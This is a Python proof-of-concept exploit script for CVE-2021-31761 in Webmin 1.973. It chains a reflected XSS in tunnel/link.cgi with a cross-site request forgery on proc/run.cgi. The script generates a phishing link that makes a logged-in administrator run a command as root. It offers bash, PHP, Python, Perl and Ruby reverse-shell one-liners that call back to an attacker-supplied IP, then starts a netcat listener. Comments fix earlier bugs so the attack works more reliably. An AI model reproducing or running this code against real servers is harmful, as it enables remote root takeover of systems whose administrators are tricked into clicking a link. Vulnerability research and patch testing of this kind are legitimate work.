Authored by Mesh3l_911, Z0ldyck

Webmin version 1.973 cross-site request forgery exploit that delivers a reverse shell. It builds a link that a logged-in Webmin administrator must open; the link reflects an auto-submitting form through tunnel/link.cgi that POSTs the chosen command to proc/run.cgi with user=root.

advisories | CVE-2021-31761

# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.com
# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761
# Version: Webmin 1.973
# Tested on: All versions <= 1.973
# CVE: CVE-2021-31761
# Description: Chains a reflected Cross-Site Scripting (XSS) flaw in
# tunnel/link.cgi with a Cross-Site Request Forgery against proc/run.cgi
# (the "running processes" feature) to obtain Remote Command Execution (RCE)
# as root in the context of a logged-in Webmin administrator.

import html
import random
import subprocess
import time
import urllib.parse


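# Banner. "\033[1;37m" / "\033[1;m" are ANSI SGR colour codes (bold white,
# then reset) and only render on ANSI-capable terminals; the ASCII art is
# reproduced as shipped.
print('''\033[1;37m

__ __ _ ____ _ _________ _ _ _
| / | | | |___ | | |___ / _ | | | | | |
| / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |/| |/ _ / __| '_ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/__ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|___||___/_| |_|____/|_| (_|_) /________/|_|__,_|__, |___|_|_/
__/ |
|___/

\033[1;m''')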

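# Cosmetic "loading" counter: "\r" returns the cursor to the start of the
# line so each iteration overwrites the previous one (101 steps * 0.02 s).
# flush=True is required because "\r" is not a newline and stdout is
# line-buffered on a tty, so the counter would otherwise not update.
for i in range(101):
    print(
        f"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {i} \033[1;m",
        "\033[1;36m%\033[1;m", end="", flush=True)
    time.sleep(0.02)
print("\n\n")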

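# Base URL of the Webmin instance. The CSRF page is delivered through
# tunnel/link.cgi on the Webmin host itself, so the HTML below ends up
# rendered in the Webmin origin (relative form action, same-origin POST).
target = input(
    "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m").strip()

# The value is concatenated straight into the link handed to the victim, so
# refuse anything that is not an absolute http(s) URL.
if not target.startswith(("http://", "https://")):
    raise SystemExit("Target must be an absolute URL starting with http:// or https://")

# Normalise any number of trailing slashes to exactly one before appending
# the link.cgi path (original only handled zero or one).
target = target.rstrip('/') + '/tunnel/link.cgi/'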

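# Listener address/port. Both values are spliced verbatim, unquoted, into the
# reverse-shell one-liners and into the nc argv, so reject anything that is
# not a plain host and a numeric port before they reach either place.
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m").strip()

port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m").strip()

if not ip or any(ch.isspace() or ch in "'\"" for ch in ip):
    raise SystemExit("IP/host must be non-empty and contain no whitespace or quotes")

# Kept as a string: later blocks concatenate it into command text.
if not port.isdigit() or not 1 <= int(port) <= 65535:
    raise SystemExit("Port must be an integer between 1 and 65535")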

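# Menu. NOTE: as shipped, `ReverseShell = input` and the menu string were two
# separate statements, so the menu was never shown, ReverseShell was bound to
# the builtin input() and the later string concatenation raised TypeError.
ReverseShell = input('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m

\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')

# Name of the scratch FIFO the bash payload creates in /tmp on the target;
# randomised so repeated runs do not collide on a leftover entry.
file_name = random.randrange(1000)

# Menu choice -> command that the victim's Webmin session will run as root.
# ip/port are inserted unquoted, exactly as the original concatenations did.
_SHELLS = {
    '1': f'mkfifo /tmp/{file_name}; nc {ip} {port} 0</tmp/{file_name} | /bin/sh >/tmp/{file_name} 2>&1; rm /tmp/{file_name}',
    '2': f''' php -r '$sock=fsockopen("{ip}",{port});exec("/bin/sh -i <&3 >&3 2>&3");' ''',
    '3': f''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''',
    # Built by concatenation: the perl one-liner contains literal braces.
    '4': (''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port
          + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''),
    '5': f''' ruby -rsocket -e'f=TCPSocket.open("{ip}",{port}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''',
}

# An unknown choice used to print a warning and carry on with the raw input
# as the command; abort instead so nothing unintended is embedded in the link.
try:
    ReverseShell = _SHELLS[ReverseShell.strip()]
except KeyError:
    raise SystemExit("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n") from None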


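def CSRF_Generator(command=None, link_base=None):
    """Build, print and return the link to send to a Webmin administrator.

    The link is ``link_base`` (the target's ``tunnel/link.cgi/`` URL) with a
    URL-encoded HTML page appended. When the page is reflected to a logged-in
    admin it auto-submits a POST to the relative action ``/proc/run.cgi`` with
    ``cmd`` set to ``command``, ``mode=0`` and ``user=root``; because the
    action is relative, the request is made from the Webmin origin itself.
    The ``<meta name="referrer" content="never">`` suppresses the Referer
    header and ``history.pushState`` rewrites the visible path to ``/``
    (presumably to survive a referer check and hide the payload in the
    address bar — not verifiable from this file).

    Args:
        command: shell command to embed; defaults to the module-level
            ``ReverseShell`` chosen interactively.
        link_base: URL prefix the encoded page is appended to; defaults to
            the module-level ``target``.

    Returns:
        The complete link as a string (also printed).
    """
    if command is None:
        command = ReverseShell
    if link_base is None:
        link_base = target

    # The command is placed inside a double-quoted HTML attribute. All of the
    # non-bash payloads contain '"', which as shipped terminated the attribute
    # and truncated the command. Entity-escape it: the browser decodes
    # &quot;/&lt;/&amp;/&#x27; back to the raw characters before submission.
    cmd_attr = html.escape(command, quote=True)

    page = f'''

<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="/proc/run.cgi" method="POST">
<input type="hidden" name="cmd" value="{cmd_attr}" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>

</html>

'''
    # Default safe="/" keeps path slashes; everything else is percent-encoded
    # so the page survives as a single URL path component.
    link = link_base + urllib.parse.quote(page)

    print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
    print(link)
    return link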

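def Netcat_listener(listen_port=None):
    """Block in a foreground ``nc -nlvp <port>`` listener for the callback.

    Args:
        listen_port: port to listen on; defaults to the module-level ``port``
            entered interactively.

    Raises:
        SystemExit: if no ``nc`` binary is on PATH.
    """
    if listen_port is None:
        listen_port = port
    print()
    # As shipped, "-nlvp <port>" was passed as ONE argv element, leaving it
    # to the particular netcat build whether a leading-space -p value is
    # accepted. One argv element per flag/value is unambiguous, and no shell
    # is involved, so the port string is never shell-interpreted.
    try:
        subprocess.run(["nc", "-nlvp", str(listen_port)])
    except FileNotFoundError:
        raise SystemExit(
            f"nc not found in PATH; start your own listener on port {listen_port}"
        ) from None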


def main():
    """Entry point: print the CSRF link, then wait for the shell callback."""
    # The listener blocks, so the link must be produced before it starts.
    for step in (CSRF_Generator, Netcat_listener):
        step()


# Script entry point (the interactive prompts above already ran at import).
if __name__ == "__main__":
    main()